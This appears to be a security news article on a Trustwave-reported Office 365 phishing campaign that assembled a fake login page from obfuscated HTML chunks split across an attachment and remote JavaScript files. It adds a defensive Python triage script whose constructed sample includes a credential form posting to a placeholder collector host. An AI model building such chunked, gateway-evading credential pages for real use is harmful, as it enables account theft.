Trustwave researchers have described a new phishing campaign in which attackers used a clever trick to deliver web pages that collect Microsoft Office 365 credentials: the pages were assembled from chunks of HTML code stored both locally and remotely.
The attackers hid HTML building blocks in JavaScript files and used those blocks to build a fake login interface that prompted the potential victim to type in their credentials.
The attacks started with an email about an investment. The attachment appeared to be an Excel file (.XLSX), but in reality it was an HTML document containing a chunk of encoded text.
Having decoded that text, the Trustwave researchers found a further layer of encoded text obfuscated with HTML entity codes. Using GCHQ’s CyberChef, a tool often referred to as the cyber Swiss army knife that handles encryption, encoding, compression, and data analysis, they found links to two JavaScript files hosted on the “yourjavascript.com” domain. The domain is already known to security researchers, because attackers had used it in other phishing campaigns.
The JavaScript files contained two blocks of encoded text hiding HTML code, a URL, and Base64-encoded data.
One of them contained the first part of the phishing page together with code that validates the victim’s email address and password: the attackers checked that the password field was not blank and used regular expressions to confirm the email address was in a valid format.
The second file contained the ‘submit’ button, the ‘form’ tags, and code for a popup message telling victims they had been logged out and needed to log in again.
The five chunks of HTML, spread across the two JavaScript files and the email attachment, assembled into 367 lines of HTML code that built a Microsoft Office 365 phishing page.
Trustwave remarked that this campaign was unusual in that the JavaScript was downloaded in obfuscated chunks from remote storage and pieced together locally, a way of avoiding detection by standard email security checks:
“This helps the attackers bypass security protections like Secure Email Gateways that might identify the malicious JavaScript from the initial attachment and block it,” the researchers explained.
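As an added illustration (not Trustwave’s code) of how a defender can triage such an attachment offline: the script below checks whether a file named like a spreadsheet is really HTML, peels off HTML-entity and percent-encoding layers, and lists the remote script sources and form targets of the decoded page. The sample attachment, its paths and the collector host are constructed placeholders; yourjavascript.com is the host named in the article.

```python
import html
import re
import urllib.parse

SPREADSHEET_EXTS = (".xlsx", ".xls", ".csv")
SCRIPT_SRC = re.compile(r'<script[^>]+src=["\']([^"\']+)["\']', re.I)
FORM_ACTION = re.compile(r'<form[^>]+action=["\']([^"\']+)["\']', re.I)

def is_disguised_html(filename: str, data: bytes) -> bool:
    """A genuine .xlsx is a ZIP container (starts with 'PK'); HTML under a spreadsheet name is suspect."""
    looks_html = data.lstrip().lower().startswith((b"<html", b"<!doctype", b"<script", b"<body"))
    return filename.lower().endswith(SPREADSHEET_EXTS) and not data.startswith(b"PK") and looks_html

def peel_encodings(text: str, max_layers: int = 8):
    """Undo HTML-entity and percent-encoding layers until the text stops changing; report the order."""
    layers = []
    for _ in range(max_layers):
        unescaped = html.unescape(text)
        if unescaped != text:
            text, layers = unescaped, layers + ["html-entity"]
            continue
        unquoted = urllib.parse.unquote(text)
        if unquoted != text:
            text, layers = unquoted, layers + ["percent"]
            continue
        break
    return text, layers

def triage(filename: str, data: bytes) -> dict:
    """Summarise what the attachment really is and which hosts the decoded page references."""
    page, layers = peel_encodings(data.decode("utf-8", errors="replace"))
    scripts, actions = SCRIPT_SRC.findall(page), FORM_ACTION.findall(page)
    hosts = {urllib.parse.urlsplit(u).hostname for u in scripts + actions}
    hosts.discard(None)
    return {"disguised_html": is_disguised_html(filename, data), "encoding_layers": layers,
            "remote_scripts": scripts, "form_actions": actions, "external_hosts": sorted(hosts)}

# Constructed sample (not the campaign's real attachment): an entity-encoded page wrapped in a
# percent-encoded layer inside an HTML body; the paths and the collector host are placeholders.
INNER_PAGE = ('<script src="https://yourjavascript.com/PLACEHOLDER/part1.js"></script>'
              '<script src="https://yourjavascript.com/PLACEHOLDER/part2.js"></script>'
              '<form action="https://collector.invalid/post.php" method="post"></form>')
ENTITY_LAYER = "".join(f"&#{ord(c)};" for c in INNER_PAGE)
SAMPLE_ATTACHMENT = ("<html><body>" + urllib.parse.quote(ENTITY_LAYER) + "</body></html>").encode()

if __name__ == "__main__":
    for key, value in triage("investment.xlsx", SAMPLE_ATTACHMENT).items():
        print(f"{key}: {value}")
```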
In addition, the campaign operators filled in the victim’s email address automatically to make the page appear more trustworthy. The researchers noted the inventiveness of the attackers and the tricks used in this campaign.
Trustwave says the URL receiving the stolen credentials for this campaign is still active. The researchers detailed their findings in a blog post yesterday.